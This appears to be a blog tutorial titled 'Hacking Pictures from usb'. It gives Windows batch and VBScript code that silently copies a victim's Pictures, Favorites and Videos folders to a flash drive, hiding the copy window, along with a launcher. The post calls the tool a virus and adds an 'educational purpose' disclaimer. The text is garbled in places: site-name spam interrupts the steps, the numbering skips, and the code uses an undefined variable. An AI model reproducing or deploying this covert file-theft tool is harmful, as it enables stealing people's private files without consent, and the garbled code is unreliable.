Hacking Pictures from usb
lets start.
Step 1: Create Autorun File for the Flash Drive
open the notepad write that code and saveas Autorun.inf
as shown in pic given below.
Step 2: Make the File for Copy of Documents to Drive
open the notepad write that code and saveas file.bat
as shown in pic given below
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls
Global Technology News
Step 3: Make Vb Script to Run Batch File As Invisible
open the notepad write that code and saveas invisible.vbs
as shown in pic given below
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Global Technology News
Global Technology NewsGlobal Technology NewsGlobal Technology News
Global Technology News
Global Technology News
Step 4: Make a Batch File to Launch Vb Script and File.batch
open the notepad write that code and saveas launch.bat
as shown in pic given below
wscript.exe \invisible.vbs file.bat
Global Technology News |
Step 7: Put All Files of codes which have we save above in usb drive and Try Out
thats It
NOTE:
This virus is for just educational purpose.
No comments:
Post a Comment